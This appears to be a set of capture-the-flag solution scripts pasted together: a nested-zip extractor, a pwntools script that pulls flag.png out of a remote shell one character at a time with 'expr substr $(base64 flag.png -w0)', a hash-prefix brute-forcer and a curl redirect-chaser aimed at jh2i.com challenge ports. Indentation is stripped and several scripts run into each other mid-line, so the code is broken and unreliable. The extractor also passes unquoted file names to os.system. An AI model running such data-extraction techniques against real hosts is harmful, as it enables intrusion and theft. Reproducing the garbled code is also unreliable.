import os
def getnext(cur):
code = os.system(f"7z e {cur} >/dev/null")
if code:
print("Extraction error... quitting!")
quit()
files = os.listdir('.')
files.remove(cur)
files.remove("popper.py")
print(files[0])
os.system(f"rm {cur}")
return files[0]
cur = "pop.zip"
while True:
cur = getnext(cur)from pwn import *
host = ("jh2i.com", 50015)
import string
mapc = {}
r = remote(*host)
def runCmd(cmd):
r.clean()
r.sendline(cmd)
return r.clean(timeout=0.3).split(b"\r\n")[2:8]
for c in string.printable:
mapc[c] = runCmd(f"echo '{c}'")
def lookup(val):
for k, v in mapc.items():
if v == val:
return k
def readOutput(cmd):
template = "expr substr $({}) {} 1"
output = ""
pos = 1
for c in range(1, 9293):
out = runCmd(template.format(cmd, c))
char = lookup(out)
print(char, end='')
output += char
return output
print(readOutput("base64 flag.png -w0"))from pwn import *
from pwnlib.util.iters import mbruteforce
from hashlib import md5, sha1
methods = {"md5sum":md5, "sha1sum":sha1}
host = ("jh2i.com", 50005)
r = remote(*host)
for x in range(50):
r.recvuntil('Enter the data required for the first part of the ')
method = r.recvuntil(' ')[:-1]
sum = methods[method]
r.recvuntil(': ')
hash = r.recvline().strip()
import string
#chars = string.printable
chars = [chr(c) for c in range(256)]
chars.remove('\r')
chars.remove('\n')
def checkhash(string):
if sum(string).hexdigest().startswith(hash):
return True
return False
print("Goal: " + hash)
print("Method: " + method)
key = mbruteforce(checkhash, chars, 5, method = 'upto')
print(list(key))
r.clean()
r.sendline(key)
print(r.recvline(timeout=0.5))
print(r.clean(timeout=0.5))import os
import re
url = "http://jh2i.com:50011/site/flag.php"
urls = []
while 'sorry' not in url:
data = os.popen(f"curl -Is {url}").read()
url = "http://jh2i.com:50011" + re.findall("Location: (.*)",data)[0]
print(url)
urls.append(url)
print(urls)
flag = ''
for url in urls:
data = os.popen(f"curl {url} 2>/dev/null").read()
if data:
flag += data[-2]
print(flag)